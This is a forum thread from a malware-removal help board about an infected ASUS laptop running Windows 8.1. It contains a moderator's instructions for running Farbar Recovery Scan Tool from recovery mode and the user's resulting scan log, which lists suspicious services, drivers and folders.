1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.
  2. You are viewing our forum as a guest. For full access please Register. WindowsBBS.com is completely free, paid for by advertisers and donations.

Solved Extremely High Disk Activity with various virus infections

Discussion in 'Malware and Virus Removal' started by scgoh123, 2017/03/13.

  1. 2017/03/13
    scgoh123

    scgoh123 Well-Known Member Thread Starter

    Joined:
    2009/09/04
    Messages:
    352
    Likes Received:
    2
    Trophy Points:
    233
    Location:
    Singapore
    Computer Experience:
    Still Improving
    My friend's laptop has heavily infected with viruses. Here are the basic specs of her laptop:

    ASUS TP300L

    Intel i3 1.90GHz
    4GB RAM
    500GB HDD
    OS Windows 8

    The main problem is with the above specs, her laptop lags heavily even though she's opening Microsoft Word or browsing with Google Chrome.

    Second thing that I've noticed is there's a lot of ASUS smart gesture program (like 10+ background processes) running which eats up the RAM and disk usage.

    Third one is her browser was hijacked with various PUPs and her default search engine has changed to another one instead of google.

    Last one is her laptop always lose WiFi connection with unknown reasons.

    Required logs will be posted later because the laptop took ages to scan and there's an error which is 'FRST failed to write in directory C:\FRST\Drivers'
     
  2. 2017/03/13
    scgoh123

    scgoh123 Well-Known Member Thread Starter

    Joined:
    2009/09/04
    Messages:
    352
    Likes Received:
    2
    Trophy Points:
    233
    Location:
    Singapore
    Computer Experience:
    Still Improving
    [​IMG]
    10 minutes has passed and it's still at the initializing stage.

    UPDATE: 50 mins had passed but it keeps scanning Asus TPcenter.exe and Asus TPstrike.dll indefinitely.
     
    Last edited: 2017/03/13

  3. to hide this advert.

  4. 2017/03/13
    broni

    broni Moderator Malware Analyst

    Joined:
    2002/08/01
    Messages:
    21,483
    Likes Received:
    103
    Trophy Points:
    843
    Location:
    Daly City, CA
    Computer Experience:
    Experienced
    Please, observe following rules:
    • Read all of my instructions very carefully. Your mistakes during cleaning process may have very serious consequences, like unbootable computer.
    • If you're stuck, or you're not sure about certain step, always ask before doing anything else.
    • Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest.
    • Never run more than one scan at a time.
    • Keep updating me regarding your computer behavior, good, or bad.
    • The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know.
    • If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in malware removal forum.
    • I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me.

    =============================

    Still stuck?
     
  5. 2017/03/13
    scgoh123

    scgoh123 Well-Known Member Thread Starter

    Joined:
    2009/09/04
    Messages:
    352
    Likes Received:
    2
    Trophy Points:
    233
    Location:
    Singapore
    Computer Experience:
    Still Improving
    Yes. Still stuck and I tried with safe mode but still the same.
     
  6. 2017/03/13
    broni

    broni Moderator Malware Analyst

    Joined:
    2002/08/01
    Messages:
    21,483
    Likes Received:
    103
    Trophy Points:
    843
    Location:
    Daly City, CA
    Computer Experience:
    Experienced
    Let's try to run it from the outside...

    For x32 (x86) bit systems download Farbar Recovery Scan Tool 32-Bit and save it to a flash drive.
    For x64 bit systems download Farbar Recovery Scan Tool 64-Bit and save it to a flash drive.

    Plug the flashdrive into the infected PC.

    If you are using Windows 10 If you're having problems accessing System Recovery Options create Windows 10 USB or DVD as described here: How to download Windows 10 and create your own installation USB flash drive or DVD and boot from it.

    If you are using Windows 8 consult How to use the Windows 8 System Recovery Environment Command Prompt to enter System Recovery Command prompt. To access Advanced Boot Options start and shut down computer TWICE. On third start you should see Advanced Boot Options.

    If you are using Vista or Windows 7 enter System Recovery Options.

    To enter System Recovery Options from the Advanced Boot Options:
    • Restart the computer.
    • As soon as the BIOS is loaded begin tapping the F8 key until Advanced Boot Options appears.
    • Use the arrow keys to select the Repair your computer menu item.
    • Select US as the keyboard language settings, and then click Next.
    • Select the operating system you want to repair, and then click Next.
    • Select your user account an click Next.

    To enter System Recovery Options by using Windows installation disc:
    • Insert the installation disc.
    • Restart your computer.
    • If prompted, press any key to start Windows from the installation disc. If your computer is not configured to start from a CD or DVD, check your BIOS settings.
    • Click Repair your computer.
    • Select US as the keyboard language settings, and then click Next.
    • Select the operating system you want to repair, and then click Next.
    • Select your user account and click Next.

    On the System Recovery Options menu you will get the following options:

    • Startup Repair
    • System Restore
    • Windows Complete PC Restore
    • Windows Memory Diagnostic Tool
    • Command Prompt
    • Select Command Prompt
    • In the command window type in notepad and press Enter.
    • The notepad opens. Under File menu select Open.
    • Select "Computer" and find your flash drive letter and close the notepad.
    • In the command window type e:\frst (for x64 bit version type e:\frst64) and press Enter
      Note:
      Replace letter e with the drive letter of your flash drive.
    • The tool will start to run.
    • When the tool opens click Yes to disclaimer.
    • Press Scan button.
    • It will make a log (FRST.txt) on the flash drive. Please copy and paste it to your reply.
     
  7. 2017/03/13
    scgoh123

    scgoh123 Well-Known Member Thread Starter

    Joined:
    2009/09/04
    Messages:
    352
    Likes Received:
    2
    Trophy Points:
    233
    Location:
    Singapore
    Computer Experience:
    Still Improving
    FRST log:
    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 13-03-2017
    Ran by SYSTEM on MININT-53ON26Q (14-03-2017 12:19:00)
    Running from F:\
    Platform: Windows 8.1 Single Language (Update) (X64) Language: English (United States)
    Internet Explorer Version 11
    Boot Mode: Recovery
    Default: ControlSet001
    ATTENTION!:=====> If the system is bootable FRST must be run from normal or Safe mode to create a complete log.

    Tutorial for Farbar Recovery Scan Tool: FRST Tutorial - How to use Farbar Recovery Scan Tool - Malware Removal Guides and Tutorials

    ==================== Registry (Whitelisted) ====================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [DptfPolicyLpmServiceHelper] => C:\Windows\system32\DptfPolicyLpmServiceHelper.exe [114048 2013-10-17] (Intel Corporation)
    HKLM-x32\...\Run: [WebStorage] => C:\Program Files (x86)\ASUS\WebStorage\2.1.11.399\ASUSWSLoader.exe [63296 2014-08-19] ()
    HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [508800 2014-12-17] (Oracle Corporation)
    HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [9080768 2016-12-11] (AVAST Software)
    HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [27308304 2017-03-06] (Dropbox, Inc.)
    HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [235624 2015-01-08] (CANON INC.)
    HKLM-x32\...\Run: [Autodesk Desktop App] => C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe [721856 2016-06-30] (Autodesk, Inc.)
    IFEO\MRT.exe: [Debugger] C:\Program Files (x86)\Tafleclwther\_ALLOWDEL_24474264\Gubed.exe -Yrrehs
    GroupPolicy: Restriction <======= ATTENTION

    ==================== Services (Whitelisted) ====================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    S2 AdAppMgrSvc; C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe [1295376 2016-06-30] (Autodesk Inc.)
    S2 Asus WebStorage Windows Service; C:\Program Files (x86)\ASUS\WebStorage\2.1.11.399\AsusWSWinService.exe [71168 2014-08-19] (ASUS Cloud Corporation)
    S2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [197128 2016-09-27] (AVAST Software)
    S2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [3704520 2017-02-18] (Microsoft Corporation)
    S3 CoordinatorServiceHost; C:\Program Files\SolidWorks Corp 2016\SOLIDWORKS\swScheduler\DTSCoordinatorService.exe [80792 2017-01-10] (Dassault Systèmes SolidWorks Corporation)
    S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
    S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
    S2 DbxSvc; C:\Windows\system32\DbxSvc.exe [46408 2017-01-20] (Dropbox, Inc.)
    S2 DptfParticipantProcessorService; C:\Windows\system32\DptfParticipantProcessorService.exe [117704 2013-10-17] (Intel Corporation)
    S2 DptfPolicyConfigTDPService; C:\Windows\system32\DptfPolicyConfigTDPService.exe [116680 2013-10-17] (Intel Corporation)
    S2 DptfPolicyLpmService; C:\Windows\system32\DptfPolicyLpmService.exe [126952 2013-10-17] (Intel Corporation)
    S2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [167088 2017-02-28] ()
    S2 GubedZL; C:\Program Files (x86)\Gubed\GubedZL.dll [118272 2017-02-03] ()
    S2 GubZL; C:\Program Files (x86)\Gub\GubZL.dll [122880 2017-02-09] ()
    S2 iedvutils; C:\Program Files (x86)\Explorer\iedvutils.exe [55992 2017-02-28] ()
    S2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [282072 2014-03-17] (Intel Corporation)
    S2 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [253528 2015-11-08] ()
    S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [827392 2013-09-02] (Intel(R) Corporation)
    S2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [131544 2013-10-23] (Intel Corporation)
    S2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-08-18] (Elex do Brasil Participações Ltda)
    S3 iThemes5; C:\Program Files (x86)\Common Files\Services\iThemes.dll [567808 2016-12-09] () <==== ATTENTION
    S2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-10-23] (Intel Corporation)
    S2 Kyubey; C:\Users\User\AppData\Roaming\Kyubey\Kyubey.exe [113664 2017-03-12] ()
    S2 mitsijm2017; C:\Program Files\Autodesk\Inventor 2017\Moldflow\bin\mitsijm.exe [967456 2015-08-04] (Autodesk, Inc.)
    S2 Ntp2NetSvc; C:\Program Files (x86)\notepad2\notepad2.exe [2340864 2017-02-16] (Don HO don.h@free.fr)
    S2 Ntp2UpSvc; C:\Program Files (x86)\Common Files\ntp2UpSvc\notepad2.exe [2340864 2017-02-16] (Don HO don.h@free.fr)
    S2 SoftshieldService; C:\Program Files (x86)\Examsoft\Softest 11.0\Examsoft.ShieldRunner.exe [67848 2017-01-07] (Hewlett-Packard)
    S2 Themes; C:\Windows\system32\themeservice.dll [59392 2014-10-28] (Microsoft Corporation) [DependOnService: iThemes5]<==== ATTENTION
    S2 TransformService; C:\Program Files\ASUS\ASUS FlipLock\TransformService.exe [73528 2014-07-08] (ASUS)
    S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
    S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)
    S2 WinSAPSvc; C:\Users\User\AppData\Roaming\WinSAPSvc\WinSAP.dll [184320 2017-03-12] (Windows)
    S2 WinSnare; C:\Users\User\AppData\Roaming\WinSnare\WinSnare.dll [776704 2017-03-12] (InterSect Alliance Pty Ltd) <==== ATTENTION
    S2 winzipersvc; C:\Program Files (x86)\WinZipper\winzipersvc.exe [1254960 2016-08-29] (ExWzp Pvt Ltd.) <==== ATTENTION
    S2 ed2kidle; "C:\Program Files (x86)\amuleC\ed2k.exe" -downloadwhenidle [X] <==== ATTENTION

    ===================== Drivers (Whitelisted) ======================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    S3 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [37656 2016-09-27] (AVAST Software)
    S1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [37144 2016-09-27] (AVAST Software)
    S2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [108816 2016-09-27] (AVAST Software)
    S1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [103064 2016-09-27] (AVAST Software)
    S0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [74544 2016-09-27] (AVAST Software)
    S1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [969184 2016-09-27] (AVAST Software)
    S1 aswSP; C:\Windows\system32\drivers\aswSP.sys [513632 2016-09-27] (AVAST Software)
    S2 aswStm; C:\Windows\system32\drivers\aswStm.sys [163416 2016-09-27] (AVAST Software)
    S0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [293352 2016-10-17] (AVAST Software)
    S3 ATP; C:\Windows\System32\drivers\AsusTP.sys [73512 2014-07-29] (ASUS Corporation)
    S3 AX88772; C:\Windows\system32\DRIVERS\ax88772.sys [113864 2013-07-18] (ASIX Electronics Corp.)
    S3 DptfDevProc; C:\Windows\system32\DRIVERS\DptfDevProc.sys [289744 2013-10-17] (Intel Corporation)
    S3 DptfManager; C:\Windows\system32\DRIVERS\DptfManager.sys [494296 2013-10-17] (Intel Corporation)
    S3 iaLPSS_GPIO; C:\Windows\System32\drivers\iaLPSS_GPIO.sys [24568 2013-08-08] (Intel Corporation)
    S3 iaLPSS_I2C; C:\Windows\System32\drivers\iaLPSS_I2C.sys [99320 2013-08-08] (Intel Corporation)
    S3 INVN_MotionApps; C:\Windows\system32\DRIVERS\WUDFRd.sys [226304 2014-10-28] (Microsoft Corporation)
    S1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-22] (Elex do Brasil Participações Ltda)
    S3 iSafeKrnlBoot; C:\Windows\System32\DRIVERS\iSafeKrnlBoot.sys [55056 2016-05-22] (Elex do Brasil Participações Ltda)
    S1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-22] (Elex do Brasil Participações Ltda)
    S1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-22] (Elex do Brasil Participações Ltda)
    S1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-22] (Elex do Brasil Participações Ltda)
    S1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-18] (Elex do Brasil Participações Ltda)
    S3 kbfiltr; C:\Windows\System32\drivers\kbfiltr.sys [17280 2012-08-05] ( )
    S3 m76usb; C:\Windows\System32\drivers\m76usb.sys [539336 2014-04-28] (Ralink Technology Corp.)
    S3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [99288 2013-10-23] (Intel Corporation)
    S3 SensorsAlsDriver; C:\Windows\System32\drivers\WUDFRd.sys [226304 2014-10-28] (Microsoft Corporation)
    S3 SensorsServiceDriver; C:\Windows\System32\drivers\WUDFRd.sys [226304 2014-10-28] (Microsoft Corporation)
    S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
    S0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
    S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)
    S3 aswHdsKe; \??\C:\Windows\system32\drivers\aswHdsKe.sys [X]
    S3 dbx; system32\DRIVERS\dbx.sys [X]
    S0 msahci; system32\drivers\msahci.sys [X]

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


    ==================== One Month Created files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2017-03-13 19:49 - 2017-03-13 20:16 - 00198774 _____ C:\Windows\ntbtlog.txt
    2017-03-13 18:57 - 2017-03-13 20:14 - 00062374 _____ C:\Users\User\Downloads\Addition.txt
    2017-03-13 18:42 - 2017-03-13 19:54 - 00059058 _____ C:\Users\User\Downloads\FRST.txt
    2017-03-13 18:37 - 2017-03-13 18:42 - 00000000 ____D C:\FRST
    2017-03-13 18:37 - 2017-03-13 18:37 - 02424832 _____ (Farbar) C:\Users\User\Downloads\FRST64.exe
    2017-03-13 01:39 - 2017-03-13 01:43 - 00000000 ____D C:\Program Files (x86)\WinSnare(4.2.9)
    2017-03-11 20:11 - 2017-03-11 20:11 - 00030195 _____ C:\Users\User\Downloads\MA1506 Tutorial 6 Solutions.pdf
    2017-03-09 06:33 - 2017-03-13 01:24 - 00321487 _____ C:\Users\User\Desktop\Water Scarcity in northwestern Cambodia.pptx
    2017-03-07 06:46 - 2017-03-11 19:59 - 00079052 _____ C:\Users\User\Documents\Microfluidic.bak
    2017-03-07 06:06 - 2017-03-07 06:06 - 00000152 _____ C:\Users\User\Documents\acad.err
    2017-03-07 05:05 - 2017-03-07 05:05 - 00000000 ____D C:\Program Files (x86)\58BEB01D_cacayima
    2017-03-07 04:42 - 2017-03-07 06:06 - 00112680 _____ C:\Users\User\Documents\Drawing1_recover.dwg
    2017-03-07 04:42 - 2017-03-07 04:42 - 00000195 ____H C:\Users\User\Documents\Drawing1.dwl2
    2017-03-07 04:42 - 2017-03-07 04:42 - 00000045 ____H C:\Users\User\Documents\Drawing1.dwl
    2017-03-07 00:09 - 2017-03-13 02:03 - 00000000 ____D C:\Program Files (x86)\amulell
    2017-03-06 20:03 - 2017-03-12 20:17 - 00003480 _____ C:\Windows\System32\Tasks\ASUS Live Update1
    2017-03-06 12:50 - 2017-03-06 12:50 - 00046184 _____ (Dropbox, Inc.) C:\Windows\System32\Drivers\dbx-stable.sys
    2017-03-05 21:38 - 2017-03-11 20:02 - 00078729 _____ C:\Users\User\Documents\Microfluidic.dwg
    2017-03-05 18:08 - 2017-03-05 18:08 - 00002116 _____ C:\Users\Public\Desktop\AutoCAD 2017 - English.lnk
    2017-03-05 18:07 - 2017-03-05 19:27 - 00000000 ____D C:\Users\User\Documents\Inventor Server SDK ACAD 2017
    2017-03-05 04:29 - 2017-03-05 04:29 - 00000000 ____D C:\Program Files (x86)\amuleCexx
    2017-03-05 04:25 - 2017-03-05 04:29 - 00000000 ____D C:\Program Files (x86)\MK
    2017-03-05 04:22 - 2010-06-01 12:55 - 00239960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_7.dll
    2017-03-05 04:22 - 2010-06-01 12:55 - 00176984 _____ (Microsoft Corporation) C:\Windows\System32\xactengine3_7.dll
    2017-03-05 04:22 - 2010-05-25 19:41 - 02401112 _____ (Microsoft Corporation) C:\Windows\System32\D3DX9_43.dll
    2017-03-05 04:22 - 2010-05-25 19:41 - 01998168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_43.dll
    2017-03-05 04:22 - 2010-05-25 19:41 - 01907552 _____ (Microsoft Corporation) C:\Windows\System32\d3dcsx_43.dll
    2017-03-05 04:22 - 2010-05-25 19:41 - 01868128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dcsx_43.dll
    2017-03-05 04:22 - 2010-05-25 19:41 - 00511328 _____ (Microsoft Corporation) C:\Windows\System32\d3dx10_43.dll
    2017-03-05 04:22 - 2010-05-25 19:41 - 00470880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_43.dll
    2017-03-05 04:22 - 2006-03-30 20:41 - 03927248 _____ (Microsoft Corporation) C:\Windows\System32\d3dx9_30.dll
    2017-03-05 04:22 - 2006-03-30 20:40 - 02388176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_30.dll
    2017-03-05 04:22 - 2006-03-30 20:40 - 00352464 _____ (Microsoft Corporation) C:\Windows\System32\xactengine2_1.dll
    2017-03-05 04:22 - 2006-03-30 20:39 - 00229584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_1.dll
    2017-03-05 04:22 - 2006-03-30 20:39 - 00083664 _____ (Microsoft Corporation) C:\Windows\System32\xinput1_1.dll
    2017-03-05 04:22 - 2006-03-30 20:39 - 00062672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xinput1_1.dll
    2017-03-05 04:22 - 2006-02-02 16:41 - 00016592 _____ (Microsoft Corporation) C:\Windows\System32\x3daudio1_0.dll
    2017-03-05 04:22 - 2006-02-02 16:41 - 00014032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\x3daudio1_0.dll
    2017-03-02 03:25 - 2017-03-13 18:30 - 00015450 _____ C:\Program Files (x86)\metadata
    2017-03-02 03:25 - 2017-03-13 01:46 - 00000040 _____ C:\Program Files (x86)\settings.dat
    2017-03-01 04:44 - 2017-03-01 04:44 - 00000000 ____D C:\Program Files (x86)\Firefox
    2017-03-01 04:42 - 2017-03-13 19:33 - 00000000 ____D C:\Program Files (x86)\58B6C1AE_cacayima
    2017-03-01 04:42 - 2017-03-09 03:39 - 00000000 _____ C:\Windows\SysWOW64\4
    2017-03-01 04:42 - 2017-03-09 03:39 - 00000000 _____ C:\Windows\SysWOW64\3
    2017-03-01 04:42 - 2017-03-02 03:25 - 00002422 _____ C:\Users\Public\Desktop\Google Chrome.lnk
    2017-03-01 04:42 - 2017-03-02 03:25 - 00002199 _____ C:\Users\Public\Desktop\Internet Explorer.lnk
    2017-03-01 04:42 - 2017-03-01 04:42 - 00000000 ____D C:\Program Files (x86)\Explorer
    2017-03-01 04:03 - 2017-03-01 04:03 - 00000000 ____D C:\Users\User\AppData\Roaming\Kyubey
    2017-03-01 02:23 - 2017-03-01 02:23 - 00012740 _____ C:\Users\User\Downloads\Chem E Challenge 2017 - Responses - 2017-3-1 13-40.xlsx
    2017-03-01 02:23 - 2017-03-01 02:23 - 00009616 _____ C:\Users\User\Downloads\Chem E Challenge Ambassador Recruitment - Responses - 2017-2-24 0-11.xlsx
    2017-03-01 02:23 - 2017-03-01 02:23 - 00003920 _____ C:\Users\User\Downloads\Chem E Challenge Ambassador Recruitment - Responses - 2017-3-1 13-39.xlsx
    2017-03-01 02:21 - 2017-03-01 02:22 - 00000000 ____D C:\Users\User\AppData\Local\WhatsApp
    2017-02-28 01:27 - 2017-02-28 01:33 - 82418960 _____ (WhatsApp) C:\Users\User\Downloads\WhatsAppSetup.exe
    2017-02-26 20:59 - 2017-02-26 20:59 - 00341094 _____ C:\Users\User\Downloads\Final Assignment2.pdf
    2017-02-26 20:11 - 2017-02-26 20:11 - 00063649 _____ C:\Users\User\Downloads\bridge3.159.0_en.html
    2017-02-20 10:39 - 2017-02-20 10:48 - 00000000 ____D C:\Program Files (x86)\dm72nb8v
    2017-02-20 08:55 - 2017-02-20 09:03 - 00000000 ____D C:\Program Files (x86)\r2i2joqg
    2017-02-20 06:39 - 2017-02-20 06:47 - 00000000 ____D C:\Program Files (x86)\ia1cpuc6
    2017-02-20 04:39 - 2017-02-20 04:53 - 00000000 ____D C:\Program Files (x86)\dwyhdf69
    2017-02-20 04:16 - 2017-02-20 04:24 - 00000000 ____D C:\Program Files (x86)\0wbg7wae
    2017-02-20 01:14 - 2017-02-20 01:17 - 00168454 _____ C:\Users\User\Downloads\The Hydrolysis of t-Butyl Chloride updated.doc.crdownload
    2017-02-20 00:39 - 2017-02-20 01:04 - 00000000 ____D C:\Program Files (x86)\lw2zy2ie
    2017-02-19 23:57 - 2017-02-20 00:18 - 00000000 ____D C:\Program Files (x86)\gyzi4t6u
    2017-02-19 07:29 - 2017-02-19 07:31 - 03087864 _____ (Google) C:\Users\User\Downloads\chrome_cleanup_tool.exe
    2017-02-16 16:55 - 2017-02-16 16:58 - 00000000 ____D C:\Program Files (x86)\4itqc3ys
    2017-02-16 05:44 - 2017-02-16 05:45 - 00000000 ____D C:\Program Files (x86)\ju8x1gmi
    2017-02-16 02:39 - 2017-02-16 02:40 - 00000000 ____D C:\Program Files (x86)\m7x11pin
    2017-02-16 00:40 - 2017-02-16 00:40 - 00000000 ____D C:\Program Files (x86)\notepad2
    2017-02-16 00:39 - 2017-02-16 00:40 - 00000000 ____D C:\Program Files (x86)\l54k8krf
    2017-02-15 05:19 - 2017-02-15 05:19 - 04575394 _____ C:\Users\User\Downloads\Chapter 6 Mechanical Properties.pdf
    2017-02-15 04:39 - 2017-02-15 04:40 - 00000000 ____D C:\Program Files (x86)\59uga437
    2017-02-15 02:39 - 2017-02-15 02:40 - 00000000 ____D C:\Program Files (x86)\1mrl8vv0
    2017-02-14 17:07 - 2017-02-14 17:09 - 00000000 ____D C:\Program Files (x86)\0fg9beco
    2017-02-14 06:39 - 2017-02-14 06:40 - 00000000 ____D C:\Program Files (x86)\hmq44j4e
    2017-02-14 06:07 - 2017-02-14 06:07 - 00000000 ____D C:\Users\User\AppData\Local\Stancine
    2017-02-14 06:07 - 2017-02-14 06:07 - 00000000 ____D C:\ProgramData\Apple Computer
    2017-02-14 06:04 - 2017-03-02 07:05 - 00000000 ____D C:\Users\User\AppData\LocalLow\Mozilla
    2017-02-14 06:04 - 2017-03-02 03:25 - 00002325 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
    2017-02-14 06:04 - 2017-02-14 06:04 - 00000000 ____D C:\Users\User\AppData\Roaming\Firefox
    2017-02-14 06:04 - 2017-02-14 06:04 - 00000000 ____D C:\Users\User\AppData\Local\Firefox
    2017-02-14 06:04 - 2016-05-22 18:41 - 00055056 _____ (Elex do Brasil Participações Ltda) C:\Windows\System32\Drivers\iSafeKrnlBoot.sys
    2017-02-14 06:04 - 2016-05-18 22:42 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\Windows\System32\Drivers\iSafeNetFilter.sys
    2017-02-14 06:03 - 2017-02-14 06:03 - 00000000 ____D C:\Users\User\AppData\Roaming\Elex-tech
    2017-02-14 06:03 - 2017-02-14 06:03 - 00000000 ____D C:\Program Files (x86)\Stancine
    2017-02-14 06:03 - 2017-02-14 06:03 - 00000000 ____D C:\Program Files (x86)\Elex-tech
    2017-02-14 05:23 - 2017-02-21 21:25 - 00000000 ____D C:\Program Files (x86)\bilibili
    2017-02-14 05:22 - 2017-02-20 01:48 - 00000000 ____D C:\Program Files (x86)\BikaQRssReader
    2017-02-14 05:22 - 2017-02-14 05:23 - 00000000 ____D C:\Program Files (x86)\t0ocinc7
    2017-02-14 05:22 - 2017-02-14 05:22 - 00003218 _____ C:\Windows\System32\Tasks\BikaQ_FetchAndUpgrade_CanBeDel
    2017-02-13 16:00 - 2017-02-13 16:00 - 00000000 ____D C:\Program Files (x86)\xdm3x2z0
    2017-02-13 07:20 - 2017-03-13 19:33 - 00000000 ____D C:\Users\User\AppData\Roaming\WinSAPSvc
    2017-02-13 07:05 - 2017-02-13 07:06 - 00000000 ____D C:\Program Files (x86)\3ioaeew8

    ==================== One Month Modified files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2017-03-13 20:17 - 2013-08-22 05:25 - 00262144 ___SH C:\Windows\System32\config\BBI
    2017-03-13 19:47 - 2013-08-22 06:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
    2017-03-13 19:45 - 2016-08-16 05:48 - 00000554 _____ C:\Windows\Tasks\MATLAB R2016a Startup Accelerator.job
    2017-03-13 19:43 - 2015-07-12 13:04 - 00004180 _____ C:\Windows\System32\Tasks\avast! Emergency Update
    2017-03-13 19:41 - 2016-07-29 11:43 - 00000000 ____D C:\Program Files (x86)\WinZipper
    2017-03-13 19:41 - 2015-07-12 17:18 - 00000000 ___RD C:\Users\User\OneDrive
    2017-03-13 19:41 - 2015-07-12 11:49 - 00000094 _____ C:\Users\User\AppData\Roaming\sp_data.sys
    2017-03-13 19:40 - 2015-07-12 11:51 - 00003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3023424667-1579791547-2771295078-1001
    2017-03-13 19:39 - 2015-11-08 08:41 - 00000000 ___RD C:\Users\User\Dropbox
    2017-03-13 19:39 - 2015-07-12 12:35 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
    2017-03-13 19:38 - 2016-08-23 07:01 - 00000000 _____ C:\Users\Public\Documents\report.dat
    2017-03-13 19:35 - 2015-11-08 08:31 - 00000910 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job
    2017-03-13 19:34 - 2013-08-22 06:44 - 00616208 _____ C:\Windows\System32\FNTCACHE.DAT
    2017-03-13 19:33 - 2016-08-22 00:40 - 00000000 ____D C:\ProgramData\ChelfNotify
    2017-03-13 19:33 - 2015-11-08 08:31 - 00000000 ____D C:\Program Files (x86)\Dropbox
    2017-03-13 19:25 - 2017-01-10 00:20 - 00000000 ____D C:\Users\User\AppData\Local\Akamai
    2017-03-13 18:53 - 2015-11-08 08:31 - 00000914 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job
    2017-03-13 18:30 - 2017-01-08 04:28 - 00000000 ____D C:\Program Files (x86)\reports
    2017-03-13 02:04 - 2017-01-16 16:58 - 00000000 ____D C:\Users\User\AppData\Roaming\aMule
    2017-03-13 01:43 - 2017-01-19 02:10 - 00003590 _____ C:\Windows\System32\Tasks\Milimili
    2017-03-13 01:43 - 2017-01-09 03:18 - 00000000 ____D C:\Users\User\AppData\Roaming\WinSnare
    2017-03-12 20:17 - 2016-09-02 19:25 - 00003470 _____ C:\Windows\System32\Tasks\ASUS Live Update2
    2017-03-12 18:15 - 2015-07-12 11:45 - 00000000 ____D C:\Users\User\AppData\Local\Packages
    2017-03-12 16:12 - 2015-07-12 17:19 - 00003906 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{870AB941-DEA7-4AE7-ACD4-F8FC5B4235A8}
    2017-03-11 01:45 - 2013-08-22 07:36 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
